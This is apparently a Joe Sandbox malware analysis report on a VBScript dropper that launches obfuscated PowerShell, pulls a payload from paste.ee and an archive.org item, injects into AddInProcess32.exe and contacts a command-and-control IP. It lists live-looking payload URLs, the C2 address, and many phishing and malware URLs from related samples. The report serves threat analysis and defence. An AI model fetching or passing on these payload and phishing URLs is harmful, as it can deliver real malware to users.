        Scheduled Task/Job
        12
        Obfuscated Files or Information
        Security Account Manager121
        Security Software Discovery
        SMB/Windows Admin SharesData from Network Shared Drive11
        Encrypted Channel
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts1
        Scheduled Task/Job
        Login HookLogin Hook1
        Software Packing
        NTDS2
        Process Discovery
        Distributed Component Object ModelInput Capture1
        Non-Standard Port
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud Accounts3
        PowerShell
        Network Logon ScriptNetwork Logon Script1
        DLL Side-Loading
        LSA Secrets41
        Virtualization/Sandbox Evasion
        SSHKeylogging2
        Non-Application Layer Protocol
        Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts41
        Virtualization/Sandbox Evasion
        Cached Domain Credentials1
        Application Window Discovery
        VNCGUI Input Capture3
        Application Layer Protocol
        Data Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items212
        Process Injection
        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523822 Sample: qiEmGNhUij.vbs Startdate: 02/10/2024 Architecture: WINDOWS Score: 100 24 paste.ee 2->24 26 ia600100.us.archive.org 2->26 40 Multi AV Scanner detection for domain / URL 2->40 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 48 11 other signatures 2->48 9 wscript.exe 1 2->9         started        signatures3 46 Connects to a pastebin service (likely for C&C) 24->46 process4 signatures5 50 VBScript performs obfuscated calls to suspicious functions 9->50 52 Suspicious powershell command line found 9->52 54 Wscript starts Powershell (via cmd or directly) 9->54 56 3 other signatures 9->56 12 powershell.exe 7 9->12         started        process6 signatures7 58 Suspicious powershell command line found 12->58 60 Obfuscated command line found 12->60 62 Found suspicious powershell code related to unpacking or dynamic code loading 12->62 15 powershell.exe 14 15 12->15         started        19 conhost.exe 12->19         started        process8 dnsIp9 30 paste.ee 188.114.96.3, 443, 49706 CLOUDFLARENETUS European Union 15->30 32 ia600100.us.archive.org 207.241.227.240, 443, 49705 INTERNET-ARCHIVEUS United States 15->32 34 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 15->34 36 Writes to foreign memory regions 15->36 38 Injects a PE file into a foreign processes 15->38 21 AddInProcess32.exe 1 2 15->21         started        signatures10 process11 dnsIp12 28 148.113.165.11, 3236, 49707 GOOGLE-PRIVATE-CLOUDUS United States 21->28

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        qiEmGNhUij.vbs5%ReversingLabsWin32.Trojan.Generic
        qiEmGNhUij.vbs10%VirustotalBrowse
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        ia600100.us.archive.org0%VirustotalBrowse
        paste.ee1%VirustotalBrowse
        SourceDetectionScannerLabelLink
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://nuget.org/nuget.exe0%URL Reputationsafe
        https://oneget.orgX0%URL Reputationsafe
        https://aka.ms/pscore680%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
        https://oneget.org0%URL Reputationsafe
        http://www.apache.org/licenses/LICENSE-2.00%VirustotalBrowse
        http://paste.ee1%VirustotalBrowse
        http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
        https://paste.ee1%VirustotalBrowse
        https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtve5;9jDbase64Content1%VirustotalBrowse
        https://github.com/Pester/Pester1%VirustotalBrowse
        https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt10%VirustotalBrowse
        https://www.google.com0%VirustotalBrowse
        https://analytics.paste.ee1%VirustotalBrowse
        https://cdnjs.cloudflare.com0%VirustotalBrowse
        https://secure.gravatar.com0%VirustotalBrowse
        https://themes.googleusercontent.com0%VirustotalBrowse
        https://ia600100.us.archive.org1%VirustotalBrowse
        NameIPActiveMaliciousAntivirus DetectionReputation
        ia600100.us.archive.org
        207.241.227.240
        truefalseunknown
        paste.ee
        188.114.96.3
        truetrueunknown
        NameMaliciousAntivirus DetectionReputation
        https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtfalseunknown
        https://paste.ee/d/AaTNM/0true
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtve5;9jDbase64Contentpowershell.exe, 00000004.00000002.1489737253.000001DFB53B2000.00000004.00000800.00020000.00000000.sdmpfalseunknown
          http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1489737253.000001DFB6BEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1506314735.000001DFC51FE000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000004.00000002.1489737253.000001DFB688E000.00000004.00000800.00020000.00000000.sdmpfalseunknown
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1489737253.000001DFB6AA2000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://paste.eepowershell.exe, 00000004.00000002.1489737253.000001DFB578C000.00000004.00000800.00020000.00000000.sdmpfalseunknown
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1489737253.000001DFB6AA2000.00000004.00000800.00020000.00000000.sdmpfalseunknown
          https://go.micropowershell.exe, 00000004.00000002.1489737253.000001DFB61B3000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://contoso.com/Licensepowershell.exe, 00000004.00000002.1506314735.000001DFC51FE000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://www.google.com;powershell.exe, 00000004.00000002.1489737253.000001DFB578C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1489737253.000001DFB556C000.00000004.00000800.00020000.00000000.sdmpfalse
            unknown
            https://contoso.com/Iconpowershell.exe, 00000004.00000002.1506314735.000001DFC51FE000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://ia600100.us.arXpowershell.exe, 00000004.00000002.1489737253.000001DFB61B3000.00000004.00000800.00020000.00000000.sdmpfalse
              unknown
              https://analytics.paste.eepowershell.exe, 00000004.00000002.1489737253.000001DFB578C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1489737253.000001DFB556C000.00000004.00000800.00020000.00000000.sdmpfalseunknown
              https://paste.eepowershell.exe, 00000004.00000002.1489737253.000001DFB55B0000.00000004.00000800.00020000.00000000.sdmpfalseunknown
              https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1489737253.000001DFB6AA2000.00000004.00000800.00020000.00000000.sdmpfalseunknown
              https://www.google.compowershell.exe, 00000004.00000002.1489737253.000001DFB578C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1489737253.000001DFB556C000.00000004.00000800.00020000.00000000.sdmpfalseunknown
              https://contoso.com/powershell.exe, 00000004.00000002.1506314735.000001DFC51FE000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1489737253.000001DFB6BEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1506314735.000001DFC51FE000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://oneget.orgXpowershell.exe, 00000004.00000002.1489737253.000001DFB688E000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://analytics.paste.ee;powershell.exe, 00000004.00000002.1489737253.000001DFB578C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1489737253.000001DFB556C000.00000004.00000800.00020000.00000000.sdmpfalse
                unknown
                https://ia600100.us.archive.orgpowershell.exe, 00000004.00000002.1489737253.000001DFB61B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1489737253.000001DFB53B2000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                https://cdnjs.cloudflare.compowershell.exe, 00000004.00000002.1489737253.000001DFB578C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1489737253.000001DFB556C000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                https://aka.ms/pscore68powershell.exe, 00000002.00000002.1540245190.00000250259F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1540245190.00000250259DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1489737253.000001DFB5191000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://cdnjs.cloudflare.com;powershell.exe, 00000004.00000002.1489737253.000001DFB578C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1489737253.000001DFB556C000.00000004.00000800.00020000.00000000.sdmpfalse
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1540245190.0000025025A19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1489737253.000001DFB5191000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2703147210.0000000002D91000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://secure.gravatar.compowershell.exe, 00000004.00000002.1489737253.000001DFB578C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1489737253.000001DFB556C000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  https://themes.googleusercontent.compowershell.exe, 00000004.00000002.1489737253.000001DFB578C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1489737253.000001DFB556C000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  https://oneget.orgpowershell.exe, 00000004.00000002.1489737253.000001DFB688E000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://ia600100.us.archive.orgpowershell.exe, 00000004.00000002.1489737253.000001DFB6846000.00000004.00000800.00020000.00000000.sdmpfalse
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    148.113.165.11
                    unknownUnited States
                    396982GOOGLE-PRIVATE-CLOUDUStrue
                    188.114.96.3
                    paste.eeEuropean Union
                    13335CLOUDFLARENETUStrue
                    207.241.227.240
                    ia600100.us.archive.orgUnited States
                    7941INTERNET-ARCHIVEUSfalse
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1523822
                    Start date and time:2024-10-02 05:22:08 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 5m 54s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:10
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:qiEmGNhUij.vbs
                    renamed because original name is a hash value
                    Original Sample Name:41eb6115196af3892e27dba0a38c0376900f7d96b0e5721e4383b5e75d7379e7.vbs
                    Detection:MAL
                    Classification:mal100.troj.expl.evad.winVBS@8/7@2/3
                    EGA Information:
                    • Successful, ratio: 66.7%
                    HCA Information:
                    • Successful, ratio: 99%
                    • Number of executed functions: 12
                    • Number of non-executed functions: 4
                    Cookbook Comments:
                    • Found application associated with file extension: .vbs
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded IPs from analysis (whitelisted): 2.19.126.154, 2.19.126.137, 93.184.221.240
                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, wu-b-net.trafficmanager.net
                    • Execution Graph export aborted for target powershell.exe, PID 1212 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    TimeTypeDescription
                    23:23:08API Interceptor41x Sleep call for process: powershell.exe modified
                    23:23:17API Interceptor1x Sleep call for process: AddInProcess32.exe modified
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    148.113.165.11INV04105025.vbsGet hashmaliciousUnknownBrowse
                    • 148.113.165.11/document
                    188.114.96.3hbwebdownload - MT 103.exeGet hashmaliciousFormBookBrowse
                    • www.j88.travel/c24t/?Edg8Tp=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+lW3g3vOrk23&iL30=-ZRd9JBXfLe8q2J
                    z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                    • www.bayarcepat19.click/g48c/
                    update SOA.exeGet hashmaliciousFormBookBrowse
                    • www.bayarcepat19.click/5hcm/
                    docs.exeGet hashmaliciousFormBookBrowse
                    • www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F
                    https://wwvmicrosx.live/office365/office_cookies/mainGet hashmaliciousHTMLPhisherBrowse
                    • wwvmicrosx.live/office365/office_cookies/main/
                    http://fitur-dana-terbaru-2024.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                    • fitur-dana-terbaru-2024.pages.dev/favicon.ico
                    http://mobilelegendsmycode.com/Get hashmaliciousUnknownBrowse
                    • mobilelegendsmycode.com/favicon.ico
                    http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwEGet hashmaliciousWinSearchAbuseBrowse
                    • download.all-instructions.com/Downloads/Instruction%2021921.pdf.lnk
                    ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                    • www.chinaen.org/zi4g/
                    http://twint.ch-daten.com/de/receive/bank/sgkb/79469380Get hashmaliciousUnknownBrowse
                    • twint.ch-daten.com/socket.io/?EIO=4&transport=polling&t=P8hxwsc
                    207.241.227.240ZJbugHcHda.vbsGet hashmaliciousPureLog StealerBrowse
                      0BO4n723Q8.vbsGet hashmaliciousPureLog StealerBrowse
                        PofaABvatI.vbsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtfGet hashmaliciousPureLog StealerBrowse
                            RFQ 2024.09.26-89 vivecta.vbsGet hashmaliciousPureLog StealerBrowse
                              AGMETIGA zapytanie ofertowe.xlsGet hashmaliciousPureLog StealerBrowse
                                sostener.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                  asegurar.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                    SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                      LJ1IZDkHyE.htaGet hashmaliciousCobalt Strike, Remcos, PureLog StealerBrowse
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        paste.eeasegurar.vbsGet hashmaliciousRemcosBrowse
                                        • 188.114.97.3
                                        dcsegura.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                                        • 188.114.97.3
                                        asegura.vbsGet hashmaliciousRemcosBrowse
                                        • 188.114.97.3
                                        RFQ-5120240930 VENETA PESCA SRL.vbsGet hashmaliciousVIP KeyloggerBrowse
                                        • 188.114.97.3
                                        sostener.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                        • 188.114.97.3
                                        asegurar.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                        • 188.114.97.3
                                        hnvc.vbsGet hashmaliciousPureLog StealerBrowse
                                        • 188.114.97.3
                                        wm.vbsGet hashmaliciousPureLog Stealer, XWormBrowse
                                        • 188.114.96.3
                                        Zoom_Invite.call-660194855683.wsfGet hashmaliciousXWormBrowse
                                        • 188.114.97.3
                                        reported_account_violation-pdf-67223451.wsfGet hashmaliciousXWormBrowse
                                        • 188.114.97.3
                                        ia600100.us.archive.orgZJbugHcHda.vbsGet hashmaliciousPureLog StealerBrowse
                                        • 207.241.227.240
                                        0BO4n723Q8.vbsGet hashmaliciousPureLog StealerBrowse
                                        • 207.241.227.240
                                        PofaABvatI.vbsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 207.241.227.240
                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtfGet hashmaliciousPureLog StealerBrowse
                                        • 207.241.227.240
                                        RFQ 2024.09.26-89 vivecta.vbsGet hashmaliciousPureLog StealerBrowse
                                        • 207.241.227.240
                                        AGMETIGA zapytanie ofertowe.xlsGet hashmaliciousPureLog StealerBrowse
                                        • 207.241.227.240
                                        sostener.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                        • 207.241.227.240
                                        asegurar.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                        • 207.241.227.240
                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                        • 207.241.227.240
                                        LJ1IZDkHyE.htaGet hashmaliciousCobalt Strike, Remcos, PureLog StealerBrowse
                                        • 207.241.227.240
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        INTERNET-ARCHIVEUSZJbugHcHda.vbsGet hashmaliciousPureLog StealerBrowse
                                        • 207.241.227.240
                                        0BO4n723Q8.vbsGet hashmaliciousPureLog StealerBrowse
                                        • 207.241.227.240
                                        PofaABvatI.vbsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 207.241.227.240
                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtfGet hashmaliciousPureLog StealerBrowse
                                        • 207.241.227.240
                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtfGet hashmaliciousRemcosBrowse
                                        • 207.241.227.96
                                        RFQ 2024.09.26-89 vivecta.vbsGet hashmaliciousPureLog StealerBrowse
                                        • 207.241.227.240
                                        AGMETIGA zapytanie ofertowe.xlsGet hashmaliciousPureLog StealerBrowse
                                        • 207.241.227.240
                                        REQUEST FOR QUOTATION.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                        • 207.241.235.61
                                        sostener.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                        • 207.241.227.240
                                        asegurar.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                        • 207.241.227.240
                                        CLOUDFLARENETUSPofaABvatI.vbsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 162.159.140.237
                                        mitec_purchase_order_PDF (1).vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                        • 172.66.0.235
                                        http://lamourskinclinic.com.auGet hashmaliciousUnknownBrowse
                                        • 104.18.10.207
                                        https://unpaidrefund.top/view/mygovGet hashmaliciousHTMLPhisherBrowse
                                        • 188.114.96.3
                                        payment copy.exeGet hashmaliciousFormBookBrowse
                                        • 23.227.38.74
                                        DHL Shipping documents 0020398484995500.exeGet hashmaliciousAgentTeslaBrowse
                                        • 104.26.12.205
                                        https://docs.google.com/presentation/d/e/2PACX-1vRuKBrQqA6BNfxZo0BAmhaaVHWHS5xGpGnvHJ3KKWtc6LdsEuOoWSlBNaOKZjp5GXLjhWJKRMb-grou/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                        • 104.21.46.216
                                        https://sanbernardinoscounty.telcom-info.com/Get hashmaliciousHtmlDropperBrowse
                                        • 104.21.55.67
                                        Electronic_Receipt_ATT0001.htmGet hashmaliciousUnknownBrowse
                                        • 104.17.25.14
                                        http://t1.global.clubavolta.com/r/?id=h53ebcb4b,29506a5f,2988ba3e&e=cDE9UkVEX0dMX0xveWFsdHlMYXVuY2hTb2x1cy1OT0NPTS1BTEwtMDExMDIwMjQtMV9YWCZwMj1kNzEwNWE1Zi00NjE3LWVmMTEtOWY4OS0wMDBkM2EyMmNlYTE&s=MLotNdk8aEH7W1636YhgxIdQC5od3UWYqTZw3tm9630Get hashmaliciousUnknownBrowse
                                        • 172.67.180.104
                                        GOOGLE-PRIVATE-CLOUDUShttps://bit.ly/4eqfXtgGet hashmaliciousUnknownBrowse
                                        • 67.199.248.11
                                        http://mutaksmklogns.godaddysites.com/Get hashmaliciousUnknownBrowse
                                        • 67.199.248.11
                                        https://solanadefimainnet.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                        • 148.113.153.93
                                        http://www.card.xn--6qq986b3xl/higgs-domino/Get hashmaliciousUnknownBrowse
                                        • 67.199.248.10
                                        https://smallpdf.com/sign-pdf/document#data=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJodHRwczovL2VzaWduLnNtYWxscGRmLXN0YWdpbmcuY29tIiwic3ViIjoiNjE3MmQyMzMtODcyNy00M2NhLWI1NjQtYjgwZDUyZjYxYmVjIiwiYXVkIjpbImVzaWduIl0sImV4cCI6MTcyODYzODEyMCwibmJmIjoxNzI3NDI4NTIwLCJpYXQiOjE3Mjc0Mjg1MjAsImp0aSI6IjYxNzJkMjMzLTg3MjctNDNjYS1iNTY0LWI4MGQ1MmY2MWJlYyIsInBheWxvYWQiOnsiZW52ZWxvcGVfaWQiOiI2ZWRlMzFjZS00Mzc2LTQwYzItYjJjNy1jMDc2Y2M3MjY4NjIiLCJzaWduX3JlcXVlc3RfaWQiOiI2MTcyZDIzMy04NzI3LTQzY2EtYjU2NC1iODBkNTJmNjFiZWMiLCJ0b2tlbl90eXBlIjoibm90aWZpY2F0aW9uIiwidXNlcl9lbWFpbCI6ImNoYW8ud3VAd3JpLm9yZyIsInVzZXJfZmlyc3RuYW1lIjoiY2hhby53dUB3cmkub3JnIiwidXNlcl9sYXN0bmFtZSI6ImNoYW8ud3VAd3JpLm9yZyJ9fQ.UX67GiHBKgjV8XyH-SFTt_KgB2I_q2j9cbGTSqbzRvY&eid=6ede31ce-4376-40c2-b2c7-c076cc726862&esrt=6172d233-8727-43ca-b564-b80d52f61becGet hashmaliciousUnknownBrowse
                                        • 148.113.163.217
                                        http://matamesklinog.godaddysites.com/Get hashmaliciousUnknownBrowse
                                        • 67.199.248.11
                                        https://secure.rpcthai.com/Get hashmaliciousUnknownBrowse
                                        • 148.113.153.94
                                        https://onlyclips.site/?title=quinnfinite&ref=gitGet hashmaliciousUnknownBrowse
                                        • 148.113.153.94
                                        https://t.co/yuxfZm8KPg?amp=1Get hashmaliciousUnknownBrowse
                                        • 67.199.248.11
                                        http://loginnetflixleiojfioje.blogspot.com.ng/Get hashmaliciousHTMLPhisherBrowse
                                        • 67.199.248.10
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        3b5074b1b5d032e5620f69f9f700ff0eiJEK0xwucj.vbsGet hashmaliciousUnknownBrowse
                                        • 207.241.227.240
                                        • 188.114.96.3
                                        ZJbugHcHda.vbsGet hashmaliciousPureLog StealerBrowse
                                        • 207.241.227.240
                                        • 188.114.96.3
                                        0BO4n723Q8.vbsGet hashmaliciousPureLog StealerBrowse
                                        • 207.241.227.240
                                        • 188.114.96.3
                                        PofaABvatI.vbsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 207.241.227.240
                                        • 188.114.96.3
                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                        • 207.241.227.240
                                        • 188.114.96.3
                                        mitec_purchase_order_PDF (1).vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                        • 207.241.227.240
                                        • 188.114.96.3
                                        DHL Shipping documents 0020398484995500.exeGet hashmaliciousAgentTeslaBrowse
                                        • 207.241.227.240
                                        • 188.114.96.3
                                        http://tvsurf.jp/Get hashmaliciousUnknownBrowse
                                        • 207.241.227.240
                                        • 188.114.96.3
                                        https://files.constantcontact.com/2d77228b901/702368a5-3f96-4cb6-b61d-aab8728be1ff.pdfGet hashmaliciousUnknownBrowse
                                        • 207.241.227.240
                                        • 188.114.96.3
                                        https://sanbernardinoscounty.telcom-info.com/Get hashmaliciousHtmlDropperBrowse
                                        • 207.241.227.240
                                        • 188.114.96.3
                                        No context
                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                        Category:dropped
                                        Size (bytes):71954
                                        Entropy (8bit):7.996617769952133
                                        Encrypted:true
                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):328
                                        Entropy (8bit):3.1391791584200512
                                        Encrypted:false
                                        SSDEEP:6:kKAlD9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:IlaDnLNkPlE99SNxAhUe/3
                                        MD5:50E0927878EF7101BDE6B93AD4183D8E
                                        SHA1:251E711C5F6275C3CA929216E38954D496C504E9
                                        SHA-256:CD792F5C1162A50F9C9E4CE86E3FE6A7DE3C348E25BBD125F59A5168A461130F
                                        SHA-512:D91029F8EB2596F8C80260D74FDF8AEC6B3531F386D4900FAA96CDF5B5FA178CF08A5650DEA314B64CA396506EB6AD5712FC015CD12642F55AD491268DDD3AAC
                                        Malicious:false
                                        Reputation:low
                                        Preview:p...... .........Slz...(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
